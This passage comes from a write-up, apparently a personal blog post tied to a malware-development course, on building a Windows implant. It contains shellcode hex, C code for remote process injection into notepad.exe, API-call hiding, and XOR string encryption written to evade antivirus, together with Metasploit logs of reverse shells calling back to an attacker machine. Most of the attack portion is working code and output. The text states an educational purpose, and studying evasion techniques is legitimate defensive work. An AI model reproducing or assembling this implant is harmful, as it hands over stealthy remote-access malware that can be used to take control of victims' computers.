000001D919200080  D6 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1  ÖH1À¬AÁÉ.A.Á8àuñ  
000001D919200090  4C 03 4C 24 08 45 39 D1 75 D8 58 44 8B 40 24 49  L.L$.E9ÑuØXD.@$I  
000001D9192000A0  01 D0 66 41 8B 0C 48 44 8B 40 1C 49 01 D0 41 8B  .ÐfA..HD.@.I.ÐA.  
000001D9192000B0  04 88 41 58 41 58 5E 48 01 D0 59 5A 41 58 41 59  ..AXAX^H.ÐYZAXAY  
000001D9192000C0  41 5A 48 83 EC 20 41 52 FF E0 58 41 59 5A 48 8B  AZH.ì ARÿàXAYZH.

Continuing execution and checking the Metasploit session, I got a shell:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.252:4444 
[*] Sending stage (336 bytes) to 192.168.1.244
[*] Command shell session 1 opened (192.168.1.252:4444 -> 192.168.1.244:53734) at 2023-04-12 18:06:40 -0400

Shell Banner:
Microsoft Windows [Version 10.0.19044.2728]
-----
          

C:\Users\developer\Desktop\Combined Project>

This proves that I was able to encrypt the payload (the ico file) with AES-256 and successfully decrypt/run it in memory.

Implant Upgrade 2: Injecting Payload into Remote Process

In summary, so far the implant stores a reverse shell payload that is AES-256 encrypted within the resource section of the executable. It is able to decrypt it in memory and run the decrypted payload to achieve a reverse shell.

This next section will be adding the capability of code injection into the implant. Code injection is a technique employed by adversaries to insert malicious code into a running process, typically with the objective of gaining control over the process and executing arbitrary code within its context. There are several benefits of utilizing code injection from an attacker point-of-view:

1. Escaping short-lived processes: In some instances, processes may be short-lived, such as a backdoored application session that only lasts until the user closes the application. Code injection can be employed to preserve a session and maintain access to the compromised system even after the original process has ended.

2. Changing the working context: Injecting code into a different process can help attackers avoid raising suspicion. For example, if Word.exe were to establish a connection to the internet, it might trigger alerts in monitoring systems. By injecting code into a more benign process, like chrome.exe, attackers can blend in with normal activity and minimize the likelihood of detection.

3. Gaining additional Command and Control (C2) connections: Adhering to the principle "Two is one, one is none," attackers often seek to establish multiple C2 connections. This redundancy ensures that if one connection is detected or disrupted, the attacker can still maintain access to the compromised system through an alternative channel.

4. Enhancing stealth capabilities: Code injection techniques can make it more difficult for security tools and analysts to detect malicious activity. By running malicious code within the context of a legitimate process, attackers can bypass security measures and evade detection, thereby prolonging their presence in the targeted system.

In conclusion, code injection is a powerful technique used by attackers to maintain persistence, evade detection, and exploit vulnerabilities in targeted systems. Understanding this method is essential for Red Team researchers and security professionals alike to develop effective countermeasures and improve overall system security.

The following is a provided code template for code injection:

unsigned char payload[] = {[... payload was defined here..]};

int FindTarget(const char *procname) {

        HANDLE hProcSnap;
        PROCESSENTRY32 pe32;
        int pid = 0;
                
        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
                
        pe32.dwSize = sizeof(PROCESSENTRY32); 
                
        if (!Process32First(hProcSnap, &pe32)) {
                CloseHandle(hProcSnap);
                return 0;
        }
                
        while (Process32Next(hProcSnap, &pe32)) {
                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
                        pid = pe32.th32ProcessID;
                        break;
                }
        }
                
        CloseHandle(hProcSnap);
                
        return pid;
}

int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {

        LPVOID pRemoteCode = NULL;
        HANDLE hThread = NULL;

  
        pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
        WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
        
        hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL);
        if (hThread != NULL) {
                WaitForSingleObject(hThread, 500);
                CloseHandle(hThread);
                return 0;
        }
        return -1;
}

int main(void) {
    
	int pid = 0;
    HANDLE hProc = NULL;

	pid = FindTarget("notepad.exe");

	if (pid) {
		printf("Notepad.exe PID = %d\n", pid);

		// try to open target process
		hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
						FALSE, (DWORD) pid);

		if (hProc != NULL) {
			Inject(hProc, payload, payload_len);
			CloseHandle(hProc);
		}
	}
	return 0;
}

The code attempts to inject a given payload into a running instance of the "notepad.exe" process. The code consists of three main functions: FindTarget, Inject, and main.

Here's a high-level overview of what each function does:

1. FindTarget:

   • Takes a process name (in this case, "notepad.exe") as an argument and searches for a running instance of that process

   • Creates a snapshot of all running processes on the system using CreateToolhelp32Snapshot

   • Iterates through the processes using Process32First and Process32Next, comparing the process name with argument passed into the function procname

   • If a match is found, the function returns the process ID (PID) of the target process. Otherwise, it returns 0

2. Inject:

   • Takes a handle to the target process, a payload, and the payload length as arguments

   • Allocates memory within the target process's address space using VirtualAllocEx with the MEM_COMMIT and PAGE_EXECUTE_READ flags

   • Copies the payload into the allocated memory using WriteProcessMemory.

   • Creates a new thread in the target process using CreateRemoteThread, which starts execution at the address of the injected payload

   • Waits for the thread to complete execution using WaitForSingleObject, then closes the thread handle

3. main:

   • Calls FindTarget to obtain the PID of the "notepad.exe" process

   • If a valid PID is found, it opens the target process using OpenProcess with the necessary access rights (PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE)

   • If the process handle is successfully obtained, it calls the Inject function with the handle, payload, and payload length

   • Finally, it closes the process handle

To implement this in the currently existing implant code, the following modifications were made:

• Added the following variables on the top of the code which will be used for finding the process ID and for the handle return value when calling OpenProcess:

  // =====================
  // Variable declarations
  // =====================
  void * payload_memory_buffer; 	    // pointer to the memory buffer that stores the extracted payload
  BOOL virtualprotect_return_value; 	// flag to see if VirtualProtect returned successfully
  HANDLE thread_handle; 				// handle for the newly created thread
  DWORD old_protection = 0; 			// used to store the previous memory protection of the allocated buffer
  HGLOBAL resource_handle = NULL; 	// handle to store return value from LoadResource() Win API
  HRSRC resource; 					// handle to store return value from FindResource() Win API
  		
  unsigned char * payload_data; 		// pointer to the actual data of the payload
  unsigned int payload_size; 			// size of the payload data in bytes
  
  char key[] = { 0x7b, 0x89, 0xca, 0xda, 0x91, 0xf3, 0x64, 0xb6, 0x9d, 0x43, 0x77, 0xbd, 0xca, 0x9f, 0xfd, 0xfe };
  
  int pid = 0; // New variable for process injection
  HANDLE hProc = NULL; // New variable for process injection

• Within the current implant code, comment out functionality that executes the payload:

  // ========================================================
  // LOAD THE PAYLOAD INTO THE PROCESS MEMORY 
  // Allocate memory in the current process, copy the payload 
  // into the new memory block, and change the protection 
  // of the memory block to allow it to be executed
  // ========================================================
  payload_memory_buffer = VirtualAlloc(0, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  RtlMoveMemory(payload_memory_buffer, payload_data, payload_size);
  AESDecrypt((char *) payload_memory_buffer, payload_size, key, sizeof(key));
  	
  // BELOW WAS COMMENTED OUT IN FAVOR OF PROCESS INJECTION
  // virtualprotect_return_value = VirtualProtect(payload_memory_buffer, payload_size, PAGE_EXECUTE_READ, &old_protection);
  	
  
  // BELOW WAS COMMENTED OUT IN FAVOR OF PROCESS INJECTION
  // ======================================================================
  // EXECUTE THE PAYLOAD
  // If the buffer protection was changed successfully, create a new thread 
  // that starts executing the code located at the beginning of the 
  // allocated buffer then wait indefinitely for the thread to terminate
  // ======================================================================
  //if ( virtualprotect_return_value != 0 ) 
  //{
  //	thread_handle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) payload_memory_buffer, 0, 0, 0);
  //	WaitForSingleObject(thread_handle, -1);
  //}

• Added code template from above

• Changed the variable from payload (on the Inject function call) to payload_memory_buffer since it will be injecting the decrypted shellcode

• Changed the variable from payload_length (on the Inject functional call) to payload_size since that is the variable name in the code we’re implementing it to

Upon execution, the PID gets printed which confirms the program was able to find the process. Starting the Metasploit multi handler session after, it gets a callback from the system:

C:\Users\developer\Desktop\Combined Project>implant.exe
[+] Found target, Notepad.exe PID = 4624

C:\Users\developer\Desktop\Combined Project>

Checking in on the Metasploit multi handler:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.252:4444 
[*] Sending stage (336 bytes) to 192.168.1.244
[*] Command shell session 1 opened (192.168.1.252:4444 -> 192.168.1.244:58719) at 2023-04-13 16:30:14 -0400

Shell Banner:
Microsoft Windows [Version 10.0.19044.2846]
(c) Microsoft Corporation. All rights reserved.

C:\Users\developer>

Now the implant can successfully inject the decrypted shellcode into a remote process. The final improvements will be related to obfuscation of function calls and string encryption.

Implant Upgrade 3: Hiding Function Calls

fFunction call obfuscation is important for security researchers because it significantly complicates the process of analysis. Obfuscation allows malware to evade detection and bypass security measures more effectively. Function call obfuscation can evade antivirus (AV) measures by disguising the behavior and structure of malicious code, making it difficult for traditional signature-based detection methods to identify the threat. By altering the names, arguments, or structure of function calls, malware developers can generate unique code patterns that do not match known malicious signatures. This allows the malware to slip past AV systems that rely heavily on signature matching. Consequently, this technique increases the chances of a successful attack and reduces the likelihood of detection by AV solutions.

Revisiting the import table by using pestudio, the functions that were used to perform process injection were seen, such as the functions bellow:

• OpenProcess

• VirtualAllocEx

• WriteProcessMemory

• CreateRemoteThread

• WaitForSingleObject

To start off, let’s start by getting the OpenProcess function removed from the import table. First, here’s the function syntax by the Microsoft Docs Website (https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess):

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

Then, within the code, I dedicated a section where I will put the function pointer declarations. To declare the function pointers that match the Windows API function, remove the [in] and [out] tags. In addition, make it a pointer by using WINAPI *. Here’s how it looks like for OpenProcess:

// ======================================
// FUNCTION CALL OBFUSCATION DECLARATIONS
// ======================================
HANDLE (WINAPI * pOpenProcess)(DWORD dwDesiredAccess, BOOL  bInheritHandle, DWORD dwProcessId);

Next, before right before the original OpenProcess portion within the code, set the pointer declared in the previous step and call GetProcAddress() with the GetModuleHandle("kernel32.dll") and OpenProcess as the arguments. Essentially it would be [pointer variable name] = GetProcAddress(GetModuleHandle("[dll]"), "[original function]");. Note that the dll will be dependent on what the Microsoft docs say and it may differ from WinAPI to WinAPI, check to ensure you got the right dll. Example using the same OpenProcess function:

pOpenProcess = GetProcAddress(GetModuleHandle("kernel32.dll"), "OpenProcess");

Last, replace the original OpenProcess portion within the code and replace it with pOpenProcess. Exanoke below:

Code before implementation:

hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
						FALSE, (DWORD) pid);

Code after implementation:

// This declaration I made toward the top for code cleanliness
// Putting it here for visualization
HANDLE (WINAPI * pOpenProcess)(DWORD dwDesiredAccess, BOOL  bInheritHandle, DWORD dwProcessId);

pOpenProcess = GetProcAddress(GetModuleHandle("kernel32.dll"), "OpenProcess");
		
hProc = pOpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
						FALSE, (DWORD) pid);

Checking the import table on pestudio, OpenProcess doesn’t show up! I then did this for all the other Windows APIs.

Before (above) and after (below) hiding function calls:

Looking at the imports (both tables were sorted by technique) on the top pestudio window, we see some of the WinAPIs used for process injection such as the following:

• VirtualAlloc

• VirtualAllocEx

• WriteProcessMemory

• CreateRemoteThread

• OpenProcess

On the bottom pestudio window, we see that those WinAPIs are not found. However looking at the strings tab within pestudio, we can see those same functions that we’ve hidden in the import table, this leads to the next upgrade of hiding strings.

Implant Upgrade 4: Encrypting Strings

The reason why those function calls that we’re hidden in the import table shows up in strings is due to it being coded within quotes during the GetProcAddress() call. For instance:

pVirtualAlloc = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");

The strings "kernel32.dll" and "VirtualAlloc" being defined like so is what makes it appear in the strings table. To hide these, we’ll be using XOR encryption/decryption and we’ll be defining the ciphertext of these strings as a byte array. To accomplish this I’ve used the following python3 code to encrypt a list of Windows APIs and strings in a text file named plaintext_strings.txt:

import sys

def xor_with_key(string, key):
    # Convert string and key to bytes
    string_bytes = string.encode()
    key_bytes = key.encode()

    # Perform XOR operation byte by byte
    result_bytes = bytearray()
    for i in range(len(string_bytes)):
        result_bytes.append(string_bytes[i] ^ key_bytes[i % len(key_bytes)])

    # Convert to C-style hexadecimal format
    result_c_format = ", ".join([f"0x{byte:02X}" for byte in result_bytes])
    return result_c_format

def main():
    if len(sys.argv) < 2:
        print("Please provide a key as an argument.")
        return

    key = sys.argv[1]

    try:
        with open("plaintext_strings.txt", "r") as file:
            for line in file:
                string = line.strip()
                xor_value = xor_with_key(string, key)
                print("unsigned char os_{0}[] = {{ {1} }};".format(string, xor_value))
    except FileNotFoundError:
        print("File not found.")

if __name__ == "__main__":
    main()

The contents of plaintext_strings.txt (the text file with the strings to encrypt):

CloseHandle
CreateRemoteThread
FindResourceA
kernel32.dll
LoadResource
LockResource
notepad.exe
OpenProcess
RtlMoveMemory
SizeofResource
VirtualAlloc
VirtualAllocEx
WaitForSingleObject
WriteProcessMemory

For a key, let’s use something that doesn’t look outwardly suspicious that could hide with other strings that are already predefined, in this situation I chose to use StdEndl. Running the python code with the key the following output was generated (have to remove the dot characters in os_notepad.exe and os_kernel32.dll variable names) :

unsigned char os_CloseHandle[] = { 0x10, 0x18, 0x0B, 0x36, 0x0B, 0x2C, 0x0D, 0x3D, 0x10, 0x08, 0x20 };
unsigned char os_CreateRemoteThread[] = { 0x10, 0x06, 0x01, 0x24, 0x1A, 0x01, 0x3E, 0x36, 0x19, 0x0B, 0x31, 0x0B, 0x30, 0x04, 0x21, 0x11, 0x05, 0x21 };
unsigned char os_FindResourceA[] = { 0x15, 0x1D, 0x0A, 0x21, 0x3C, 0x01, 0x1F, 0x3C, 0x01, 0x16, 0x26, 0x0B, 0x25 };
unsigned char os_kernel32.dll[] = { 0x38, 0x11, 0x16, 0x2B, 0x0B, 0x08, 0x5F, 0x61, 0x5A, 0x00, 0x29, 0x02 };
unsigned char os_LoadResource[] = { 0x1F, 0x1B, 0x05, 0x21, 0x3C, 0x01, 0x1F, 0x3C, 0x01, 0x16, 0x26, 0x0B };
unsigned char os_LockResource[] = { 0x1F, 0x1B, 0x07, 0x2E, 0x3C, 0x01, 0x1F, 0x3C, 0x01, 0x16, 0x26, 0x0B };
unsigned char os_notepad.exe[] = { 0x3D, 0x1B, 0x10, 0x20, 0x1E, 0x05, 0x08, 0x7D, 0x11, 0x1C, 0x20 };
unsigned char os_OpenProcess[] = { 0x1C, 0x04, 0x01, 0x2B, 0x3E, 0x16, 0x03, 0x30, 0x11, 0x17, 0x36 };
unsigned char os_RtlMoveMemory[] = { 0x01, 0x00, 0x08, 0x08, 0x01, 0x12, 0x09, 0x1E, 0x11, 0x09, 0x2A, 0x1C, 0x1D };
unsigned char os_SizeofResource[] = { 0x00, 0x1D, 0x1E, 0x20, 0x01, 0x02, 0x3E, 0x36, 0x07, 0x0B, 0x30, 0x1C, 0x07, 0x09 };
unsigned char os_VirtualAlloc[] = { 0x05, 0x1D, 0x16, 0x31, 0x1B, 0x05, 0x00, 0x12, 0x18, 0x08, 0x2A, 0x0D };
unsigned char os_VirtualAllocEx[] = { 0x05, 0x1D, 0x16, 0x31, 0x1B, 0x05, 0x00, 0x12, 0x18, 0x08, 0x2A, 0x0D, 0x21, 0x14 };
unsigned char os_WaitForSingleObject[] = { 0x04, 0x15, 0x0D, 0x31, 0x28, 0x0B, 0x1E, 0x00, 0x1D, 0x0A, 0x22, 0x02, 0x01, 0x23, 0x31, 0x1E, 0x01, 0x26, 0x1A };
unsigned char os_WriteProcessMemory[] = { 0x04, 0x06, 0x0D, 0x31, 0x0B, 0x34, 0x1E, 0x3C, 0x17, 0x01, 0x36, 0x1D, 0x29, 0x09, 0x3E, 0x1B, 0x16, 0x3C };

Next, defining the key like so:

const char* xor_key = "StdEndl";

Next, the following C/C++ code will take those byte arrays of the XOR encrypted function names, the key, and decrypts it:

char* xor_with_key(const unsigned char* xor_values, size_t xor_length, const char* key) 
{
    char* decrypted_string = (char*)malloc(xor_length + 1);
    size_t key_length = strlen(key);

    for (size_t i = 0; i < xor_length; i++) 
    {
        decrypted_string[i] = xor_values[i] ^ key[i % key_length];
    }
	
    decrypted_string[xor_length] = '\0';
    return decrypted_string;
}

In the case of pVirtualAlloc = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc"); instead of manually coding in VirtualAlloc you essentially replace it with xor_with_key(os_VirtualAlloc, sizeof(os_VirtualAlloc), xor_key), below is an example of it with also doing the same thing for kernel32.dll:

unsigned char os_kernel32dll[] = { 0x38, 0x11, 0x16, 0x2B, 0x0B, 0x08, 0x5F, 0x61, 0x5A, 0x00, 0x29, 0x02 };
unsigned char os_VirtualAlloc[] = { 0x05, 0x1D, 0x16, 0x31, 0x1B, 0x05, 0x00, 0x12, 0x18, 0x08, 0x2A, 0x0D };

pVirtualAlloc = GetProcAddress(GetModuleHandle(xor_with_key(os_kernel32dll, sizeof(os_kernel32dll), xor_key)), xor_with_key(os_VirtualAlloc, sizeof(os_VirtualAlloc), xor_key));

Doing the same process above for all the Windows API strings, here shows the before (above) and after (below) doing string encryption of the strings table within pestudio:

As shown all of the Process Injection strings have been removed.

Running notepad (the target process) and the implant, we still get a reverse shell which shows that all the strings have been encrypted correctly:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.252
lhost => 192.168.1.252
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.252:4444 
[*] Sending stage (336 bytes) to 192.168.1.244
[*] Command shell session 1 opened (192.168.1.252:4444 -> 192.168.1.244:61400) at 2023-05-18 11:35:23 -0400

Shell Banner:
Microsoft Windows [Version 10.0.19044.2965]
-----
          

C:\Users\developer\Desktop\Combined Project>whoami
whoami
desktop-fsutp8h\developer

Conclusion and Summary

This project showcases most of the techniques learned from the Sektor7 course Malware Development Essentials. The writeup itself was purely for educational purposes and to raise awareness of some common malware development techniques. It is essential to emphasize that malware development and execution should only be conducted in controlled and authorized environments where explicit permission has been granted by the system owner or responsible authority.

Starting from a base implant that executes unencrypted shellcode, we were able to apply multiple techniques to upgrade it to:

• Have an encrypted payload

• Ability to decrypt in memory

• Perform process injection

• Executes the shellcode in the remote process

• Hidden function calls

• Encrypting suspicious strings

Windows API List Summary

List of Windows APIs used within each section:

• Storing payload in resource section

  • Getting payload from resource section

    • FindResource

    • LoadResource

    • LockResource

    • SizeofResource

  • Copying payload to executable portion in memory

    • VirtualAlloc

    • RtlMoveMemory

    • VirtualProtect

  • Payload launching

    • CreateThread

    • WaitForSingleObject

• Payload encryption/decryption

  • The crypt32.lib and advapi32.lib libraries need to be imported

  • CryptAquireContextW

  • CryptCreateHash

  • CryptHashData

  • CryptDeriveKey

  • CryptDecrypt

  • CryptReleaseContext

  • CryptDestroyHash

  • CryptDestroyKey

• Hiding function calls

  • GetProcAddress

  • GetModuleHandle

• Process Injection

  • VirtualAllocEx

  • WriteProcessMemory

  • CreateRemoteThread